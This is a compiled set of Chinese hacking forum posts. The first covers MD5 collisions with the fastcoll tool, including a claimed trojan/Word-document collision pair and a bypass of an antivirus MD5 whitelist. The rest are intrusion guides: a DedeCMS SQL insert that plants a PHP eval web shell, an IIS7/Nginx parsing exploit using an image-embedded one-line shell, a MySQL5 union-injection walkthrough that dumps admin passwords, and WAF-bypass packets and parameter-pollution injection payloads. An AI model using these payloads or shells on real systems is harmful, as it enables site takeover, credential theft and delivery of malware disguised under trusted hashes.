这几位密码学家编写的“快速 MD5 碰撞生成器”：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
源代码：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip

测了一下那2个exe md5 的确同样的。

运行结果不同。未必对现有exe 有实质性的威胁，可是很明显是有威胁的。若是能够加入***。从新算出md5 的话
那就厉害了

如下是引用片断：

用易语言编译的两个EXE，文件内容不一样，可是MD5相同。有图为证。
两个EXE均打包在附件里，人格担保EXE很纯洁（为了压缩体积，加了UPX壳）。

若是你怀疑这两个EXE实际上是相同的，而我只是根据某些外部特征来实现不一样的运行效果的话，你就尽情地测试吧。
好比你能够把它们随意更改文件名、复制到其余电脑中运行、虚拟机中运行一个并在真实机器中运行另外一个，都不会有任何影响，A仍是A，B仍是B。

你可使用一些二进制编辑工具来比对两个EXE文件，你会发现它们的不一样。也能够像我上传的图片那样，比对包括MD5在内的其余类型的hash。你获得的答案仍然是：它们的文件内容不一样，而MD5相同（其余的HASH特征值均不相同）。

仅供娱乐，有兴趣搞清楚怎么回事儿的，就多顶本贴，哈哈。

PS：不要骂人，说了本贴仅供娱乐，顺便讨论一下MD5而已。

如下是引用片断：

用事实说话MD5破解：md5同样两个不一样功能内容的文件(附md5破解工具)

能力有限，就很少说了。用事实说话，先看看下面两个在网上满天飞的md5同样二内容功能不一样的程序吧：

文件一：

File: D:\HelloWorld-colliding.exe
Size: 41792 bytes
Modified: 2010年5月21日, 15:38:12
MD5: 18FCC4334F44FED60718E7DACD82DDDF
CRC32: 8BEB795C

文件二：

File: D:\GoodbyeWorld-colliding.exe
Size: 41792 bytes
Modified: 2010年5月21日, 15:38:29
MD5: 18FCC4334F44FED60718E7DACD82DDDF
CRC32: 9EDE53DB

但是咱们能不能本身制做两个md5 同样而内容不一样的文件呢？请继续看下面的操做截图（后附工具）

以上就是大名鼎鼎的"构造前缀法"破解md5 的方法（如下就提供破解工具和"构造前缀法"的含义）
破解工具： Fast 破解工具.7z (88.75 KB, 下载次数: 67) 2010-6-8 12:14:15 上传下载次数: 67
下载积分: PB币 -1

-p 前缀文件（破解工具会以此文件为前缀构造md5碰撞文件）

-o 出处文件（默认的输出文件名是-o msg1.bin msg2.bin）

到这里又有人会问，能不能本身制做一个是病毒***、一个是正常无害的两个md5 同样的文件呢？？？

答案依旧是确定的，下载下面两个文件你就知道了（因为论坛不能放***之类等，因此只提供外链地址）
http://down.qiannao.com/space/file/ishagua/-4e0a-4f20-5206-4eab/package1.exe/.page
http://down.qiannao.com/space/file/ishagua/-4e0a-4f20-5206-4eab/package2.exe/.page
以上这两个文件一个自解压后是***病毒一个自解压后是一个日常的Word 文档

依旧会有人问，这是怎么生成的？（这个就不能奉告了，有兴趣的话本身慢慢研究吧，累了）。

如下是引用片断：

给你们个好玩的,,关于MD5碰撞,及360的信任列表隐患，将在6点半更新

纯讨论
不是谈怎样利用,,,,

视频地址:http://dl.dbank.com/c0bap33a8n

记录:

MD5碰撞

首先
先演示一下这两个刚碰撞出来的文件
文件名称：C:\Documents and Settings\Administrator\桌面\1\cbi.exe
文件大小：410240 字节
修改时间：2011年10月10日 16:43:41
MD5     ：6EF59C9E016669DD3146B658D11C0A8F
SHA1    ：2580646F0803AF53E0B7E70A1A1425CE210723B3
CRC32   ：6F75148B

文件名称：C:\Documents and Settings\Administrator\桌面\2\cbi2.exe
文件大小：410240 字节
修改时间：2011年10月10日 16:43:41
MD5     ：6EF59C9E016669DD3146B658D11C0A8F
SHA1    ：C6A32B97C2E5C9584AB6428D490A1EA1CEE3FCC4
CRC32   ：09F69A39

你们能够看出,,两个文件的md5值是彻底相同的
可是sh1 crc32倒是不一样的,,说明这两个文件不是相同文件,,可是
md5相同,这就是碰撞

再来看一下刚刚碰撞出来的360安装包

文件名称：C:\Documents and Settings\Administrator\桌面\cbi.exe
文件大小：32131264 字节
文件版本：8.3.0.1024
修改时间：2011年10月10日 16:34:55
MD5     ：686C066950B31203D6B688519498F943
SHA1    ：78D15715E393E7F2847F189D2F1C79BF17B3AB55
CRC32   ：6CDBAA4E

文件名称：C:\Documents and Settings\Administrator\桌面\cbi2.exe
文件大小：32131264 字节
文件版本：8.3.0.1024
修改时间：2011年10月10日 16:34:54
MD5     ：686C066950B31203D6B688519498F943
SHA1    ：8F9A9A9036063B7596D3CE2DF151E722AFB0396A
CRC32   ：65D9B793

一样的,md5相同 sha 和crc不一样

如何作出这些呢 ,都来自一位叫王小云的密码天才的思路弄的并且彻底不会影响运行

两个安装包皆可运行,,md5相同,,内容是不一样的

或许不少人会说sha1呢,,,很遗憾 05年王小云把sha1也破解了,,,,,

因此,,云在验证这方面还有电子商务这方面都要有所改进了

不说太远的,,回归话题,,说一下360本地的信任机制

能够看到 360报毒了

接下来咱们把它添加到信任列表

不少人觉得,360的信任列表是匹配路径的,,其实错了,,是直接将md5加入白名单

咱们来试试把这个文件移到其余地方

能够看到,,这个文件运行成功了,,这验证了

"不少人觉得,360的信任列表是匹配路径的,,其实错了,,是直接将md5加入白名单"

这个结论

接下来,,咱们来看看是否是必定是md5 仍是其余算法

咱们采用相同md5,可是sha1和crc彻底相同的两个文件来运行,,一样的能够运行,,由此可看出,,
360不是将路径加入信任列表,,

而是将md5加入信任列表,,,

或许目前来看这还算安全,,虽然已经能随意产生两个md5彻底相同的了,,,可是用在特殊方面,,这无疑是个巨大的漏洞,,

呵呵 ,,只是想探讨下

以上是相关的资料，须要其余资料能够本身去搜：md5 碰撞，有大量资料查阅。

实际上，MD5 值同样，但功能不同的程序很容易实现，须要一点编程知识，及一点点技巧。。。

方法你本身多试几回就知道了。。。

我本身写的俩小玩意儿以下图所演示：

MD5_碰撞测试程序_示例程序_a

MD5 Test_A.exe

MD5_碰撞测试程序_示例程序_b

MD5 Test_B.exe

MD5_碰撞测试程序_示例程序.rar：http://115.com/file/clonsfie

用到的工具以下：

一、MD5 碰撞发生器 v1.5 （MD5 Collision Generator v1.5）

二、一点点编程技巧

官方地址：http://www.win.tue.nl/hashclash/

下载地址：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

×××：http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip

MD5 碰撞发生器 v1.5，MD5 Collision Generator v1.5：

MD5 碰撞发生器 v1.5

MD5 Collision Generator v1.5

示例：

fastcoll_v1.0.0.5.exe -p C:\WINDOWS\system32\cmd.exe

fastcoll_v1.0.0.5.exe -p C:\WINDOWS\system32\cmd.exe -o a.exe b.exe

--------------------------------------------------------

MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)

Allowed options:
  -h [ --help ]           显示选项。
  -q [ --quiet ]          更简洁。
  -i [ --ihv ] arg        使用指定的初始值。默认是MD5的初始值。
  -p [ --prefixfile ] arg 使用给定前缀的文件计算初始值，并复制数据到输出文件。
  -o [ --out ] arg        设置输出文件名. 这必须是最后的选项，而且必须指定两个文件名。
                          默认: -o msg1.bin msg2.bin

--------------------------------------------------------

MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)

Allowed options:
  -h [ --help ]           Show options.
  -q [ --quiet ]          Be less verbose.
  -i [ --ihv ] arg        Use specified initial value. Default is MD5 initial
                          value.
  -p [ --prefixfile ] arg Calculate initial value using given prefixfile. Also
                          copies data to output files.
  -o [ --out ] arg        Set output filenames. This must be the last option
                          and exactly 2 filenames must be specified.
                          Default: -o msg1.bin msg2.bin

--------------------------------------------------------

# ***
# web***

分享回复喜欢

Beyond SQLi: Obfuscate and Bypass

# ***
# web***

分享回复1 喜欢

DEDECMS拿SHELL EXP

漏洞细节已经传遍了（http://www.t00ls.net/thread-17354-1-1.html），又没得玩了。

网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell

前题条件，必须准备好本身的dede数据库，而后插入数据：

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');

再用下面表单提交，shell 就在同目录下 1.php。原理本身研究。。。

</form>

function addaction()

{

document.QuickSearch.action=document.QuickSearch.doaction.value;

}

</script>

分享回复9 喜欢

通杀IIS7.0畸形解析0day漏洞和Nginx那个0day差很少

先合并一张PHP一句话图片马，合并方法：
①、DOS合并：copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom，进行图片和一句话***的合并，一句话代码为“

图片随便找一张.
【顺带着说一下edjpgcom的使用方法：打开edjpgcom.exe所在文件夹，而后把你所要修改的图片拖动到edjpgcom.exe上面，而后edjpgcom.exe会自动打开，写入想要些的代码便可】
一句话:

<?PHP fputs(fopen(’shell.php’,'w’),’<?php eval($_POST[cmd])?>’);?>

而后找个nginx的站,先注册一个用户而后在论坛上传一张咱们刚刚合并的图片一句话马。
找到图片地址,而后在地址后面加个shell.php，在浏览器中运行。
好比假设图片地址为www.doosit.cn/tupian/1.jpg
则执行地址为www.doosit.cn/tupian/1.jpg/shell.php
而后,会在目录下生成shell.php。好比:www.doosit.cn/tupian/shell.php
shell.php就是咱们的一句话地址。再拿一句话的客户端链接这个一句话地址就好。
上面就是Nginx拿站全过程，IIS7.0的畸形解析和这个相似。

找到某个使用IIS7.0架设的站，而后找到其中的图片上传点（不须要管理权限，普通注册用户便可搞定），把PHP大马后缀改为.jpg，传上去，获得图片地址。

在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。

<?fputs(fopen(“shell.PHP”,”w”),”<?eval(\$_POST[cmd]);?>”)?>

# web***
# ***

分享回复喜欢

Mysql5注射技巧总结

Mysql5和以前的版本有不少不一样的地方，灵活的运用其特性能够在***的时候省掉不少麻烦。我试图在本文把在《***周杰伦官方网站》中没有写清楚的部分表达出来，你看明白这个文章后也许你会发现，原来mysql5也能够像mssql同样注射。

1、原理分析

咱们先看看mysql5比以前增长的系统数据库information_schema的结构，它是用来存储数据库系统信息的

mysql> use information_schema;

Database changed

mysql> show tables;

+---------------------------------------+

| Tables_in_information_schema |

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| KEY_COLUMN_USAGE |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| STATISTICS |

| TABLES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+

若是读者有兴趣能够本身装一个mysql5研究一下这几个表存储的信息，我这里只挑注射中能够用到的几个表。　

| SCHEMATA ――>存储数据库名的，

|——>关键字段：SCHEMA_NAME，表示数据库名称

| TABLES ――>存储表名的

|——>关键字段：TABLE_SCHEMA表示表所属的数据库名称；

TABLE_NAME表示表的名称

| COLUMNS ――>存储字段名的

|——>关键字段：TABLE_SCHEMA表示表所属的数据库名称；

TABLE_NAME表示所属的表的名称

　　　　　　　　　COLUMN_NAME表示字段名

能够看到，咱们只要经过注射点构造查询语句遍相关字段，就能够获得咱们想要的信息了。

2、实战测试

到网上找到一个注射点，首先仍是像以往同样猜字段、版本和数据库用户,如图１

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15/*

图一

下面猜数据库,能够经过不断递增limit的第一个参数查询到全部的数据库名，如图2

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15 from/**/information_schema.SCHEMATA limit 17,1/*

图2

遍里webbase里面的表名，找到敏感的表，如图三（0x77656262617365是webbase的十六进制编码）

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.

TABLES/**/where/**/TABLE_SCHEMA=0x77656262617365/**/limit/**/11,1

图3

tg_adminuser十六进制编码为0x74675F61646D696E75736572，依次查找该表里面的字段名，如图4，图5

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.

COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/1,1

图4

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.

COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/2,1

图五

数据库，表名，字段咱们都知道了，查出密码就很简单了，如图六

xx.com/news_info.php?wid=-1/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15/**/from/**/webbase.tg_adminuse
图6

文章就到这里结束了，懂点sql语法的朋友应该看的比较明白了：）

转自 WEB***

# web***

分享回复喜欢

浅谈绕过WAF的数种方法(转载)

0×00 前言

08年初诞生了一种SQL群注***，***在全球范围内对asp，asp.net加MSSQL架构的网站进行了疯狂扫荡。因为MSSQL支持多语句注入，***经过一条结合游标的SQL语句就能将整个数据库的字段内容自动进行篡改，能够在网站上无差异的进行网页******。

互联网是快速更新迭代的，可是不少没有开发能力的单位都是经过外包创建网站，网站的程序一上线就再也无人维护，不少程序存在各类漏洞没法修补，因而WAF便有了市场，现今门槛低且最能解决问题的是针对IIS/apache的软件WAF，一般一个模块一个扩展就能搞定，固然也有耗资百万千万的硬件WAF，然而若是WAF拦截规则出现漏洞，这百万千万的硬件也就是一堆废铁。那么WAF是否真的能够解决全部的WEB安全问题呢？因此本文主要解析一些能够绕过WAF的罕见漏洞，供安全人员参考。

0×01 Request对象的包解析漏洞.

asp和asp.net的Request对象存在一个包解析漏洞，Request对象对于GET和POST包的解析过于宽松，用一句话表达就是Request对象它GET和POST傻傻分不清楚，稍有点web开发经验的同窗应该知道Request接收GET,POST,COOKIE也就是GPC传过来的数据，可是asp和.net库内置的Request对象彻底不按RFC标准来，下面咱们能够作个测试：

分别将下面两段代码保存为1.asp和1.aspx

使用asp的Request对象接收t参数传值
———————————————–
＜%
Response.Write “Request:” & Request(“t”)
%＞
———————————————–

使用asp.net的Request对象接收t参数传值
———————————————–
＜%@ Page Language=”C#” %＞
＜%
string test = Request["t"];
Response.Write(“Request:”+test);
%＞
———————————————–

使用下面的python脚本调用socket发送原始的HTTP包
———————————————–
#!/usr/bin/env python

import socket

host = ’192.168.239.129′
path = ‘/1.asp’
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

exploit_packet=”t=’/**/or/**/1=1–”
exploit_packet+=”\r\n” * 8
packet_length = len(exploit_packet)
packet=’GET ‘ + path + ‘ HTTP/1.1\r\n’
packet+=’Host: ‘ + host + ‘\r\n’
packet+=’Content-Length: %s\r\n’ % packet_length
packet+=’Content-Type: application/x-www-form-urlencoded\r\n’
packet+=’\r\n’
packet = packet + exploit_packet

print packet
s.send(packet)
buf = s.recv(1000)
if buf: print buf[buf.rfind("\r\n"):]
s.close()
———————————————–

咱们发送的原始包是：
GET /1.asp HTTP/1.1
Host: 192.168.239.129
Content-Length: 34
Content-Type: application/x-www-form-urlencoded

t=’/**/or/**/1=1–

结果返回以下：
Request:’/**/or/**/1=1–
将python测试脚本的path改成/1.aspx测试页返回一样结果。

咱们能够看到这是一个畸形的HTTP GET请求包，这个包的奥秘在于t=’/**/or/**/1=1–参数后的8个回车换行和Content-Length头，包的结构相似于一个POST包，而请求的方法是GET,最后asp和asp.net的Request对象成功的解析了这个畸形包取出了数据。

因此若是WAF没有处理好HTTP包的内容，沿用常规思路处理GET和POST的逻辑的话，那么这个畸形包将会毁掉WAF的基础防护。

0×02 被遗忘的复参***.

你们应该还记得09年的HTTP Parameter Pollution***，查看[3]文档，能够发现ASP/IIS和ASP.NET/IIS的场景下存在一个复参特性，本文将利用这种的特性的***简称为复参***，用0X01里的例子简单的测试一下:

用GET请求传入两个t参数
GET http://192.168.239.129/1.asp?t=1&t=2
将返回
Request:1, 2

asp和asp.net的Request对象接收了两个参数，而且以逗号分隔，因此便衍生出了[3]文档中的复参SQL注入方法：

Vulnerable code：
SQL=”select key from table where id=”+Request.QueryString(“id”)

This request is successfully performed using the HPP technique：
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

The SQL request becomes：
select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/usersLavakumarKuppan,

咱们能够看到经过巧妙的运用注释符结合复参特性能够分割GET参数中的SQL注入语句，若是WAF对GET参数的处理过于简单是否是会匹配不到拦截规则呢?

0×03 高级复参***.

ASP.NET的Request对象有一个Params属性，ASP.NET程序员在一些程序中会使用Request.Params["xxx"]传入数据，参考[4]微软MSDN文档咱们能够知道Params属性的特性，该属性接收GET,POST和Cookie的传值集合，这里咱们能够修改0×01里的例子测试一下：

使用asp.net的Request.Params方法接收t参数传值
———————————————–
＜%@ Page Language=”C#” %＞
＜%
string test = Request.Params["t"];
Response.Write(“Request:”+test);
%＞
———————————————–

发送一个POST包，GET,POST,COOKIE三个方法中都带有不一样的t参数内容
———————————————–
POST http://192.168.239.129/1.aspx?t=1 HTTP/1.1
Host: 192.168.239.129
Cookie: t=2

t=3
———————————————–

结果返回
Request:1,3,2

最后得出结论，Request.Params方法接收的数据是按照GPC顺序整合，看到这里的同窗再联想到0×02的复参***应该如醍醐灌顶了，咱们能够将SQL***语句拆分到GET,POST,COOKIE三个变量里进行组合***。想想WAF针对这种高级复参***是否防护好了？

0×04 后话

WAF是不可能解决全部安全问题的，本文的思路归其本源其实是描叙了WAF处理HTTP包与服务端处理HTTP包数种差别。互联网是不断更新迭代的，差别存在，相似的漏洞也会存在。
本文提到了三种绕过WAF的思路，第一种是个人原创属于0DAY状态，第二种是参考已有的复参***，其中第三种高级复参***是由Safe3同窗提出的，本文也是与Safe3同窗讨论他开发的WAF的BUG而来，因此感谢Safe3同窗。
另外请你们不要将本文的内容用于非法途径，仅供安全人员参考，谢谢。

参考：
[1].http://www.faqs.org/rfcs/rfc2616.html
[2].http://www.w3school.com.cn/asp/asp_ref_request.asp
[3].http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf
[4].http://msdn.microsoft.com/en-us/library/system.web.httprequest.aspx

Comments (0)

本站内容均为原创，转载请务必保留署名与连接！
浅谈绕过WAF的数种方法:http://www.80sec.com/%e6%b5%85%e8%b0%88%e7%bb%95%e8%bf%87waf%e7%9a%84%e6%95%b0%e7%a7%8d%e6%96%b9%e6%b3%95.html